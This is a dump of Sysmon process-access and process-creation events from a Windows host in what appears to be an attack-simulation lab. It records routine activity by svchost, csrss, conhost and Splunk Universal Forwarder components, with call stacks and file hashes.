10341000x8000000000000000806885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.988{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.973{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.973{0C1E0330-F3CA-60EB-5B79-00000000D001}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.598{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA6F08FCA467E7DF2FBE19F428623EF9,SHA256=98E9725350076A0E7897024DDAA6F9A3AB2B4D10A076655352BB27218242CA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.489{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BD6C3FD477B33222C0D0E902A6764C,SHA256=C6E99615B759F1F4FF81F0B6801DCFA24B554CD4A84668F6143E62AEDED9D3DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.301{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.285{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:26.286{0C1E0330-F3CA-60EB-5A79-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK 